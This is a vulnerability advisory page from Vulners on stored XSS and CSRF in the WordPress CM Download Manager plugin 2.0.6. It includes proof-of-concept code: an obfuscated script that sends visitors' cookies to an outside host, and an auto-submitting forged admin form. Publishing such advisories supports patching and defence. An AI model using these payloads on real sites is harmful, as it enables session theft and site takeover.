Vulners
Lucene search
WordPress CM Download Manager 2.0.6 XSS / CSRF
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2014-9129 | 5 Dec 201415:00 | – | cve |
 | CVE-2014-9129 | 5 Dec 201415:00 | – | cvelist |
 | EUVD-2014-8954 | 7 Oct 202500:30 | – | euvd |
 | CVE-2014-9129 | 5 Dec 201415:59 | – | nvd |
 | WordPress Download Manager Plugin <= 2.0.6 - Multiple CSRF and XSS | 28 Nov 201400:00 | – | patchstack |
 | Cross site request forgery (csrf) | 5 Dec 201415:59 | – | prion |
 | PT-2014-8839 · Creative Mind · Cm Download Manager | 5 Dec 201400:00 | – | ptsecurity |
 | CVE-2014-9129: XSS and CSRF in CM Download Manager plugin for WordPress | 22 Dec 201400:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 22 Dec 201400:00 | – | securityvulns |
 | CM Download Manager < 2.0.7 - CSRF to Cross-Site Scripting | 16 Jan 201500:00 | – | wpvulndb |
10
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Product: WordPress plugin cm-download-manager
Plugin page: https://wordpress.org/plugins/cm-download-manager/
Vendor: CreativeMindsSolutions http://cminds.com/
Vulnerability Type: CWE-79: Cross-site scripting
Vulnerable Versions: 2.0.6 and below
Fixed Version: 2.0.7
Solution Status: Fixed by Vendor
Vendor Notification: 2014-11-27
Public Disclosure: 2014-12-02
CVE Reference: N/A. Only assigned for CSRF
Criticality: Low
Vulnerability details:
CM Download Manager plugin for WordPress contains a flaw that allows a stored
cross-site scripting (XSS) attack. This flaw exists because the
/wp-admin/admin.php script does not validate input to the 'addons_title' POST
parameter before returning it to users. This allows an authenticated remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship between
their browser and the server.
Root cause:
The software incorrectly neutralizes user-controllable input before it is placed
in output that is used as a web page that is served to authenticated users.
Proof-of-concept:
Insert following code to CM Downloads -> Settings -> "Downloads listing title"
field with CSRF attack.
<script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110,
101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116,
116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107,
105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109,
101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105,
112, 116, 62);document.write(foo);</script>
- ---------------
Product: WordPress plugin cm-download-manager
Plugin page: https://wordpress.org/plugins/cm-download-manager/
Vendor: CreativeMindsSolutions http://cminds.com/
Vulnerability Type: CWE-352: Cross-Site Request Forgery
Vulnerable Versions: 2.0.6 and below
Fixed Version: 2.0.7
Solution Status: Fixed by Vendor
Vendor Notification: 2014-11-27
Public Disclosure: 2014-12-02
CVE Reference: CVE-2014-9129
Criticality: Low
Vulnerability details:
CM Download Manager plugin for WordPress contains a flaw on the
CMDM_admin_settings page as HTTP requests to /wp-admin/admin.php do not
require multiple steps, explicit confirmation, or a unique token when performing
sensitive actions. By tricking authenticated user into following a specially
crafted link, a context-dependent attacker can perform a CSRF attack causing the
victim to insert and execute arbitrary script code.
Root cause:
The web application does not sufficiently verify whether a well-formed, valid,
consistent request was intentionally provided by the user who submitted the
request.
Proof-of-concept:
<html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3>
<form id="f1" method="POST"
action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings">
<table><input type="text" name="addons_title" value="XSS"></table></form>
<script type="text/javascript">document.getElementById("f1").submit();</script>
</body></html>
Notes:
Other pages and/or parameters are also possibly insecure (not tested). Suggested
to do a proper security audit for their software. Vendor did not mention
security fix or CVE in ChangeLog even it was discussed several times. References
below.
Cross-site scripting:
http://cwe.mitre.org/data/definitions/79.html
https://scapsync.com/cwe/CWE-79
https://en.wikipedia.org/wiki/Cross-site_scripting
Cross-Site Request Forgery:
http://cwe.mitre.org/data/definitions/352.html
https://scapsync.com/cwe/CWE-352
https://en.wikipedia.org/wiki/Cross-site_request_forgery
- ---
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/
l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT
=bUVi
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.00262